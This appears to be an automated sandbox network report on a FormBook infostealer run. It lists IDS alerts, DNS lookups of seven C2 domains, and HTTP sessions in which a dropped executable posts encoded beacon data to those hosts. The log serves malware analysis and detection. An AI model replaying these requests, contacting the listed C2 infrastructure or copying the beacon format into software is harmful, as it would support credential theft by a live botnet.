2024-11-21T16:18:21.717739+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49986 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:24.520226+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49987 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:27.090850+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49988 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:27.090850+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49988 | 216.40.34.41 | 80 | TCP
2024-11-21T16:18:34.167613+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49989 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:36.605188+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49990 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:39.226917+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49991 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:41.990763+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49992 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:41.990763+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49992 | 13.248.169.48 | 80 | TCP
2024-11-21T16:18:49.052658+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49993 | 209.74.77.108 | 80 | TCP
2024-11-21T16:18:51.738208+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49994 | 209.74.77.108 | 80 | TCP
2024-11-21T16:18:54.457347+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49995 | 209.74.77.108 | 80 | TCP
2024-11-21T16:18:57.059059+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49996 | 209.74.77.108 | 80 | TCP
2024-11-21T16:18:57.059059+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49996 | 209.74.77.108 | 80 | TCP
2024-11-21T16:19:04.676553+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 38.47.232.194 | 80 | TCP
2024-11-21T16:19:07.346492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49998 | 38.47.232.194 | 80 | TCP
2024-11-21T16:19:10.018402+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49999 | 38.47.232.194 | 80 | TCP
2024-11-21T16:19:12.686987+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50000 | 38.47.232.194 | 80 | TCP
2024-11-21T16:19:12.686987+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50000 | 38.47.232.194 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Nov 21, 2024 16:18:47.784830093 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:47.785034895 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:47.799268961 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:47.918852091 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:49.052392006 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:49.052545071 CET8049993209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:49.052658081 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:49.315273046 CET4999380192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.334275961 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.453892946 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:50.454008102 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.468961000 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:50.589154005 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:51.737951040 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:51.738161087 CET8049994209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:51.738208055 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:51.972920895 CET4999480192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:52.990721941 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:53.110465050 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:53.110904932 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:53.126828909 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:53.246505976 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:53.246524096 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:54.456902027 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:54.457258940 CET8049995209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:54.457346916 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:54.628618002 CET4999580192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.648010015 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.767884970 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:55.767967939 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.777929068 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:55.897556067 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:57.058135986 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:57.058218956 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:18:57.059058905 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:57.062545061 CET4999680192.168.2.5209.74.77.108
                                                    Nov 21, 2024 16:18:57.182157040 CET8049996209.74.77.108192.168.2.5
                                                    Nov 21, 2024 16:19:03.036559105 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:03.158164024 CET804999738.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:03.158262968 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:03.172666073 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:03.294905901 CET804999738.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:04.676553011 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:04.796550989 CET804999738.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:04.796756029 CET4999780192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.694812059 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.814364910 CET804999838.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:05.814452887 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.832386971 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:05.952205896 CET804999838.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:07.346492052 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:07.467783928 CET804999838.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:07.467843056 CET4999880192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.365165949 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.490433931 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:08.490700006 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.506819963 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:08.626650095 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:08.626674891 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:10.018402100 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:10.138401031 CET804999938.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:10.138484955 CET4999980192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.037292957 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.157147884 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:11.157275915 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.166989088 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:11.286586046 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:12.686775923 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:12.686847925 CET805000038.47.232.194192.168.2.5
                                                    Nov 21, 2024 16:19:12.686986923 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:12.692559004 CET5000080192.168.2.538.47.232.194
                                                    Nov 21, 2024 16:19:12.815107107 CET805000038.47.232.194192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 16:15:57.266604900 CET | 55061 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 16:15:58.028167009 CET | 53 | 55061 | 1.1.1.1 | 192.168.2.5
Nov 21, 2024 16:17:47.084851980 CET | 54323 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 16:17:47.484141111 CET | 53 | 54323 | 1.1.1.1 | 192.168.2.5
Nov 21, 2024 16:18:01.804431915 CET | 51824 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 16:18:02.196445942 CET | 53 | 51824 | 1.1.1.1 | 192.168.2.5
Nov 21, 2024 16:18:16.914813042 CET | 64186 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 16:18:17.765968084 CET | 53 | 64186 | 1.1.1.1 | 192.168.2.5
Nov 21, 2024 16:18:32.101095915 CET | 65339 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 16:18:32.657233953 CET | 53 | 65339 | 1.1.1.1 | 192.168.2.5
Nov 21, 2024 16:18:47.006835938 CET | 51335 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 16:18:47.662621021 CET | 53 | 51335 | 1.1.1.1 | 192.168.2.5
Nov 21, 2024 16:19:02.118531942 CET | 59056 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 16:19:03.030514956 CET | 53 | 59056 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 16:15:57.266604900 CET | 192.168.2.5 | 1.1.1.1 | 0x57cb | Standard query (0) | www.7261ltajbc.bond | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:17:47.084851980 CET | 192.168.2.5 | 1.1.1.1 | 0xd505 | Standard query (0) | www.conansog.shop | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:01.804431915 CET | 192.168.2.5 | 1.1.1.1 | 0xe925 | Standard query (0) | www.rgenerousrs.store | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:16.914813042 CET | 192.168.2.5 | 1.1.1.1 | 0x9e74 | Standard query (0) | www.sipdontshoot.net | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:32.101095915 CET | 192.168.2.5 | 1.1.1.1 | 0xdfe6 | Standard query (0) | www.tals.xyz | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:47.006835938 CET | 192.168.2.5 | 1.1.1.1 | 0x612f | Standard query (0) | www.hobbihub.info | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:19:02.118531942 CET | 192.168.2.5 | 1.1.1.1 | 0x54f8 | Standard query (0) | www.76kdd.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 16:15:58.028167009 CET | 1.1.1.1 | 192.168.2.5 | 0x57cb | No error (0) | www.7261ltajbc.bond | | 154.12.28.184 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:17:47.484141111 CET | 1.1.1.1 | 192.168.2.5 | 0xd505 | No error (0) | www.conansog.shop | | 104.21.41.74 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:17:47.484141111 CET | 1.1.1.1 | 192.168.2.5 | 0xd505 | No error (0) | www.conansog.shop | | 172.67.162.12 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:02.196445942 CET | 1.1.1.1 | 192.168.2.5 | 0xe925 | No error (0) | www.rgenerousrs.store | | 172.67.167.146 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:02.196445942 CET | 1.1.1.1 | 192.168.2.5 | 0xe925 | No error (0) | www.rgenerousrs.store | | 104.21.57.248 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:17.765968084 CET | 1.1.1.1 | 192.168.2.5 | 0x9e74 | No error (0) | www.sipdontshoot.net | | 216.40.34.41 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:32.657233953 CET | 1.1.1.1 | 192.168.2.5 | 0xdfe6 | No error (0) | www.tals.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:32.657233953 CET | 1.1.1.1 | 192.168.2.5 | 0xdfe6 | No error (0) | www.tals.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:18:47.662621021 CET | 1.1.1.1 | 192.168.2.5 | 0x612f | No error (0) | www.hobbihub.info | | 209.74.77.108 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 16:19:03.030514956 CET | 1.1.1.1 | 192.168.2.5 | 0x54f8 | No error (0) | www.76kdd.top | 76kdd.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 21, 2024 16:19:03.030514956 CET | 1.1.1.1 | 192.168.2.5 | 0x54f8 | No error (0) | 76kdd.top | | 38.47.232.194 | A (IP address) | IN (0x0001) | false
                                                    • www.7261ltajbc.bond
                                                    • www.conansog.shop
                                                    • www.rgenerousrs.store
                                                    • www.sipdontshoot.net
                                                    • www.tals.xyz
                                                    • www.hobbihub.info
                                                    • www.76kdd.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe

Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:15:58.165290117 CET | 530 | OUT | GET /cbbl/?StWXF0Jx=paPsyhkx/nE5gApK7ClsOsCP/JDiOaF/PnUzFNUQtr02YB3yPLZBYvOPPEhjPOJc5o/riszcMLT4SZEyBJ2Z4+e1R3WiL7BxGKUkfd9BrL6F2CyldUW6llWN7R81fMOOmA==&zfI=jXEDeV4Xp62 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.7261ltajbc.bond
Connection: close
User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
Nov 21, 2024 16:17:42.073976994 CET | 295 | IN | HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Thu, 21 Nov 2024 15:17:41 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49977 | 104.21.41.74 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe

Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:17:47.623888016 CET | 786 | OUT | POST /us5e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Host: www.conansog.shop
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://www.conansog.shop
Referer: http://www.conansog.shop/us5e/
User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Ascii: StWXF0Jx=z1Y9ykdAfXkHTWs73rNCSZeqJmDscNe118EqsGYDa9db9IkEs3MavccDeeNhTkk4ygN9OdmX7v+Wy6ZAZaJ1IajbbUhieGG3l0OoSc4bBUOzpVVrjfMW458Nc3r42FtiNZQAXoZbvv+SXmKShWvnUoNFuEpGgSwPqh972RbH2WMLmwQZC3ZItusXkjF81S2RdLMr+YU=
Nov 21, 2024 16:17:48.784892082 CET | 746 | IN | HTTP/1.1 404 Not Found
Date: Thu, 21 Nov 2024 15:17:48 GMT
Content-Length: 0
Connection: close
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UL%2BQQ4tCCc6AxpKhva%2BzfcEbRTuxvV5VfAOfeCcAzI8zySXbY24csgCfUcvhOnDFovHjhBw0rolMNv%2B3IRzyAch%2BdJg%2BbrGJCuXBmZbWoxIfTijoPgOSnWKIxEWr%2FPlFS01a%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e61a6125ab40f68-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=786&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49978 | 104.21.41.74 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe

Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:17:50.282717943 CET | 806 | OUT | POST /us5e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Host: www.conansog.shop
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 229
Origin: http://www.conansog.shop
Referer: http://www.conansog.shop/us5e/
User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Ascii: StWXF0Jx=z1Y9ykdAfXkHBlk76o1CU5etGGDsStex18IqsHsTaItb4aMEv2Mai8cDV+NkLEkjygB1OYmX7ruWy7pAZrJ2JKjZT0hkD2G3l0OoScF2BUGzpllrh9kV558Ob3r4yFtmNZQmXtB9vqySXn6ShHvmaoNPkkoUhCEFnABJpg+lp1AxumhzYVRg+OAv0wNLkiX4HocbgPCxQ2jHWW/DhyqzNTKuy7H8
Nov 21, 2024 16:17:51.562854052 CET | 736 | IN | HTTP/1.1 404 Not Found
Date: Thu, 21 Nov 2024 15:17:51 GMT
Content-Length: 0
Connection: close
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuhUt7DYBU0dRmqFdJA8ZFy%2F%2FaDOfBq4mEYLQIxZT87ZgH3liJzegK9uYdtu1tEJEaJLzzsDh178IoWzk9i5x8z92YyJIsOqFgCoigIh1sEW8WbdU30QVDponseqWNfgzaBhyg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e61a6238ad58cb3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2057&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49979 | 104.21.41.74 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe

Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 16:17:52.938513041 CET | 1823 | OUT | POST /us5e/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Host: www.conansog.shop
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Origin: http://www.conansog.shop
Referer: http://www.conansog.shop/us5e/
User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Ascii: StWXF0Jx=z1Y9ykdAfXkHBlk76o1CU5etGGDsStex18IqsHsTaIlb4J0EplUaj8cDW+NlLEl5yjxLOYap7tyW95xAfZx2HKjZR0hleGHtl0/ASal2BUGzpnNrlvMV758Nc3rO2FteNZ4YXtNLvZ6SXHqSk13mSoNBjkpRhCZfnAcypgaPp1Ixtw8JEkdi9P4O5hAo737tFKY7r4Wnf3LVGSH+1R67Xy2E/PX9Xviy4Pbo7pG0yk8PBI5z07d23GUQu/NWHhdofhgD86WY13IvCqnFuk1rt4pVqDf/IT6ckMDPMhTniRmpCnOABiC5BOObeTsqAmRiyZohE7qbh8hVxSTNV36e2r8IJf2Lzl2wW+9wBLpq1AoakgizXmoCJgQfBGUXIkAJyXDkNDQd9d7DRVs+NI3JTj+VDXK46SCgMUA0ndpdMdeW5XQtCq+c6vT5Hiw3uad59JJoTq6EiGYJSIM/qkJGWTN3GL4RzSh26/l+lyOmf+00xPtJKKoo+xMGtAg3tSSjPe239VE9SEUD481X+YmymNmsJgZqKRn8WVA4xWdc9wzMNzU/gBrLA0rR96bWWvxMHlVtIa5BADG7y5wksGmHOD+csImzAo+mGXD/RIei+nZwVA34B5K8wShwZr0jfgxFSxJ4/9NSxJDjmt86ttYJZbtLaG0WjawA9xWchIxxgvqJMOCSRv7E5FogoSg3uFstKO4PA4+83Jw9t4/IjeQrRjRBppQi9NM6yyeu6IxQsMZgEMWZHPIZGgB5KOH3ZV2jAYIDypt98zz2xsWc1O9W09WIIv+cor3vA8JjSGfsNrLzK8p+KRsBW9UNR15kMb0kek11ud29Helmf0zNR3Ncp+zEYe8/3ucQhMU9Hqr8siJ9HcSqoQYcWXTjQbA4fVPS7MeIdbFBbrM0mUzKtn6cxniZy3qST+5J1X1GVQh0qrAdfKG9X4cdKV0YUsNDyVBZxuS8AhSmCUiqxF3Fbud8LnJezRNy1wz0LKYCBHrdjOu [TRUNCATED]
Nov 21, 2024 16:17:54.262159109 CET | 739 | IN | HTTP/1.1 404 Not Found
Date: Thu, 21 Nov 2024 15:17:54 GMT
Content-Length: 0
Connection: close
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BafI9j%2Bi%2Bvv10noNw6twKzYlabLpFLXV78H6cws9FqUCn%2BCbeURGInbCNCDNRmd7yE1zjuC9DZrfROQtwVzaqhW3mJ0zyPmFGn5yMk5MxZU50e0jtl5pkk4wA75aBNk53jqJEA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e61a6341e921899-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1660&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1823&delivery_rate=0&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.5 | 49980 | 104.21.41.74 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:17:55.592168093 CET | 528 | OUT | GET /us5e/?StWXF0Jx=+3wdxQ15dA0PRlxlyKsnTLOlEhuFd9nhpeMIpGJhTalb6rEI4lQ5upkBauNLLCI1kwggOdPP7drS+cJ7ELELPajCaX5eVWqFhVj1FJt4Lm6snm9lne8G6LEoCHfH0EAuWA==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.conansog.shop
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:17:56.786237001 CET | 740 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:17:56 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LMkEzQI3WwZNrbhPOGAym1Zx0McZ610w0j8HbV%2BSmtvft%2B8adHQSVXd20DYSLi2%2Bza7abWPfvzoLcEwRKoXGx5%2Fb2NV80zjmGL3K6ogyPSqV5SoPQwfKO2NbtT74YMzwAxTe8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6444f94c42c-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=528&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.5 | 49981 | 172.67.167.146 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:02.336956024 CET | 798 | OUT | POST /zr8v/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.rgenerousrs.store
                                                    Referer: http://www.rgenerousrs.store/zr8v/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 42 6e 52 41 61 38 32 53 65 64 76 41 61 69 43 64 68 68 61 42 63 30 31 62 62 36 56 72 36 5a 71 64 42 6e 6b 33 39 74 76 35 4b 79 4d 42 66 67 30 42 58 35 46 50 58 4c 7a 68 2f 4d 72 76 39 47 74 72 49 55 2f 39 49 68 6d 73 5a 37 2b 30 76 4e 56 79 4b 5a 31 53 30 6c 51 79 6e 78 59 33 38 41 56 42 76 78 5a 67 51 6e 4b 45 50 38 42 54 37 46 36 5a 54 75 34 50 6c 70 6c 61 4c 77 4d 4b 62 46 46 45 32 50 46 48 6f 53 74 76 2f 6b 4c 50 62 33 59 77 52 47 4b 5a 38 63 55 71 61 34 4c 79 68 41 37 39 71 73 32 62 34 31 70 52 61 33 78 77 70 5a 6a 62 51 31 76 63 69 66 73 51 48 38 50 30 45 59 58 51 67 79 47 54 33 74 49 3d
